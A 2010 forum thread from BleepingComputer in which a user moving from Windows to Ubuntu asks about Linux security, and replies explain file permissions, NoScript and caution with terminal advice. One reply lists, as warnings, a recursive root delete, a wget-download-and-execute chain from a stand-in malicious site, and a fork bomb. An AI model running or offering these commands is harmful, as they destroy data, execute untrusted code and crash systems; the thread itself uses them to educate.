Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Linux Security Question


  • Please log in to reply
3 replies to this topic

#1 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:02:17 AM

Posted 10 January 2010 - 12:05 AM

Hello Everyone. So I have finally had it with everything Microsoft. I have several computers all running various versions of windows. I find that I spend 80% of my time fixing malware, viruses, Trojans, bots, bugs, B.S.O.D errors etc, etc and the remaing 20% of my time is spent helping others fix all there problems with Windows. This leaves me 0% of my time to actually do any useful computing. I know all you who have switched from Windows to Linux can relate. The final straw for me was when my brand new laptop came up infected after about 5 minutes of use(Yes, I had anti virus, MBAM, SAS, etc installed from a clean flash drive before I even plugged into the Internet). In light of all this I loaded Ubuntu 9.10 onto one of my laptops and started familarizing myself with it. I am using the GUI as well as the command line for the basics and feel pretty comfortable doing so.
My question is this. I am really having a hard time feeling comfortable with going to password protected sites and doing secure computing with Linux. I have installed Firestarter and configured my firewall and also installed Clam AV. I am using Firefox as my browser. I know you guys are all going to tell me that Linux is exponential safer then Windows and there are very few viruses in the wild in Linux but I guess I need to here some experts tell me it's ok before I feel comfortable typing in passwords etc. Can some of you Linux experts PLEASE give me some peace of mind about the security of Linux so I never have to turn on my computer and see a Windows boot screen ever again? Thanks in advance for any help/comments you can provide.

Signed,
Sick of Windows

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."


BC AdBot (Login to Remove)

 


#2 MadDawg

MadDawg

  • Members
  • 453 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Houston, TX
  • Local time:03:17 AM

Posted 10 January 2010 - 12:55 AM

Linux is indeed a lot safer than Windows. The only thing I would recommend now is installing NoScript for Firefox.

EDIT: If you choose to install NoScript, I highly recommend that you whitelist any online stores you use (if any) in order to avoid being double-charged for purchases.

Edited by MadDawg, 10 January 2010 - 01:02 AM.

A penguin broke my windows with a half-eaten apple!

#3 Andrew

Andrew

    Bleepin' Night Watchman


  • Moderator
  • 8,258 posts
  • OFFLINE
  •  
  • Gender:Not Telling
  • Location:Right behind you
  • Local time:01:17 AM

Posted 10 January 2010 - 05:28 AM

Linux is indeed safer by virtue of it's multi-user design philosophy. Installing ClamAV, or indeed any antivirus program, in Linux is probably not going to add any protection. This is because the AV programs written to run on Linux are primarily aimed at systems that serve files to Windows clients (mail, http, file sharing servers, etc.)

Your question one that is prototypical of someone still reeling from their experiences under Windows: keyloggers, spyware, bots, rootkits, etc. all trying to steal your passwords and credit card number. While it is true that the crooks still want that information, if you're running Linux then it gets a whole lot harder.

The best way, I think, of describing the situation is that Linux does what the user asks it to whereas Windows attempts to predict what the user wants. This, in and of itself, is not a bad thing. But the resulting design decisions were made with that goal in mind rather than one of security. For example: in Linux systems, no file is considered to be executable unless it is explicitly marked as such; in Windows, any file ending in EXE, SCR, COM, BAT, CMD, PIF, DLL, OCX, DRV, SYS, or CPL is considered to contain executable content and will be executed automatically when the file is launched no matter what's actually inside of it or where it came from. So, while you can e-mail an EXE file to someone running Windows and Windows will execute the program immediately if the user double-clicks on it, you'd have more diffivult time getting that same user in Linux to cause the program to be executed. They would need to explicitly change the file's permissions.

As for network-related security, that is transmitting data over the internet, Linux conforms to the same standards which Microsoft (sometimes) does. SSL runs out of the box with any and all browsers that run on Linux (assuming the browser itself supports SSL, which all modern browsers do.)

The long and short of it is that, yes Linux is by default more secure than Windows is. However the security it provides does not give the user license to be stupid. There are just as many ways to destroy a Linux system as there are ways to nuke Windows. So it behooves the user to always think about what they're doing before doing it.

For example: if you browse through any Linux support forum (like ubuntuforums.org) you will no doubt see people recommending the execution of a certain command in the terminal. While 99% of the time the advice is sound (or at least not dangerous) there are some people who think it's funny to instruct new users to execute destructive commands, download tainted programs, or do other such malicious things. If you don't understand what a command does (at least in principle) then ask for clarification. If someone says you should download a file from some unknown website, make it executable, and run it, then ask yourself whether you trust the person giving the advice.

Examples of some potentially malicious commands (DO NOT RUN THESE!)

sudo rm -rf /
Tries to recursively delete your entire system

wget http://somebadsite.net/maliciousCode.sh && chmod +x maliciousCode.sh && ./maliciousCode.sh
downloads, makes executable, then runs the file maliciousCode.sh

:(){ :|:& };:
a fork bomb



If you skipped all that, then just read this: a computer is only as secure as the user's least secure action.

Edited by Andrew, 07 April 2010 - 09:47 PM.
Decrapified URLification


#4 Johnny Computer

Johnny Computer
  • Topic Starter

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:02:17 AM

Posted 10 January 2010 - 12:52 PM

Thanks to both of you for your replies. The information was very helpful. Appreciate it. :thumbsup: :flowers:

avatar591802_2.gif"DO OR DO NOT. THERE IS NO TRY."





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users